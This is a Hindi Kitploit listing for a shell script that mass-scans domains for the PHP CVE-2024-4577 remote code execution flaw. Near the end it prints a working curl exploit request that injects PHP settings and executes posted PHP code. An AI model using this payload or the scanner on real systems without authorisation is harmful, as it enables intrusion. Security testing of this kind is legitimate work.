Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577 — CVE-2024-4577 PHP रिमोट कोड एक्सीक्यूशन भेद्यता के लिए डोमेन स्कैन करने हेतु शेल स्क्रिप्ट, तैयार किए गए POST अनुरोधों के माध्यम से, मैन्युअल सत्यापन के लिए संवेदनशील लक्ष्यों को निर्यात करती है। | Kitploit
उपकरण/GitHubGitHub/graphite-org/cve-2024-4577
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubgraphite-org/cve-2024-4577

CVE-2024-4577

CVE-2024-4577 PHP रिमोट कोड एक्सीक्यूशन भेद्यता के लिए डोमेन स्कैन करने हेतु शेल स्क्रिप्ट, तैयार किए गए POST अनुरोधों के माध्यम से, मैन्युअल सत्यापन के लिए संवेदनशील लक्ष्यों को निर्यात करती है।

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577 भेद्यता जाँचकर्ता

यह स्क्रिप्ट CVE-2024-4577 द्वारा वर्णित भेद्यता की जाँच करने के लिए डिज़ाइन की गई है, जिसमें कुछ PHP कॉन्फ़िगरेशनों का दोहन करके दूरस्थ रूप से मनमाना कोड निष्पादित किया जाता है। यह डोमेन की सूची में निर्दिष्ट एंडपॉइंट्स पर POST अनुरोध भेजता है और जाँचता है कि प्रतिक्रिया भेद्यता को इंगित करती है या नहीं।

उपयोग

  1. GNU Parallel इंस्टॉल करें:

    root@kitploit:~
    sudo apt-get install parallel
    
  2. रिपॉजिटरी को क्लोन करें: इस रिपॉजिटरी को Git का उपयोग करके अपने स्थानीय मशीन पर क्लोन करें:

    root@kitploit:~
    git clone https://github.com/Yukiioz/CVE-2024-4577.git
    
  3. रिपॉजिटरी में जाएँ: क्लोन किए गए निर्देशिका में जाएँ:

    root@kitploit:~
    cd CVE-2024-4577
    
  4. डोमेन सूची तैयार करें: जाँच करने के लिए डोमेन की सूची वाली एक टेक्स्ट फ़ाइल बनाएँ। प्रत्येक डोमेन एक नई लाइन पर होना चाहिए। उदाहरण के लिए:

    root@kitploit:~
    https://example1.com
    https://example2.com
    https://example3.com
    
  5. स्क्रिप्ट चलाएँ: स्क्रिप्ट CVE-2024-4577.sh को डोमेन सूची फ़ाइल के पथ को तर्क के रूप में देते हुए निष्पादित करें:

    root@kitploit:~
    ./CVE-2024-4577.sh live-subdomains.txt | tee script.log
    
  6. आउटपुट की समीक्षा करें: स्क्रिप्ट प्रत्येक डोमेन की जाँच करते समय प्रगति जानकारी प्रदर्शित करेगी। यदि कोई डोमेन भेद्य पाया जाता है, तो उसे लाल रंग में हाइलाइट किया जाएगा। स्क्रिप्ट भेद्य डोमेन की एक सूची को vulnerable_domains.txt नामक फ़ाइल में निर्यात भी करेगी।

निर्यातित फ़ाइल: vulnerable_domains.txt

स्क्रिप्ट भेद्य डोमेन की एक सूची को vulnerable_domains.txt नामक फ़ाइल में निर्यात करती है। इस फ़ाइल में भेद्य डोमेन की एक सरल सूची होती है, प्रत्येक डोमेन एक नई लाइन पर होता है। मैन्युअल रूप से पुष्टि करने के लिए, डोमेन पर लक्ष्य एंडपॉइंट पर एक POST अनुरोध भेजने के लिए curl कमांड का उपयोग करें। https://dev.example.com/test.php को लक्ष्य डोमेन पर वास्तविक एंडपॉइंट से बदलें।

root@kitploit:~
curl -X POST https://dev.example.com/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input \
     -H "User-Agent: curl/8.3.0" \
     --data "<?php phpinfo(); ?>"
टूल डाउनलोड करें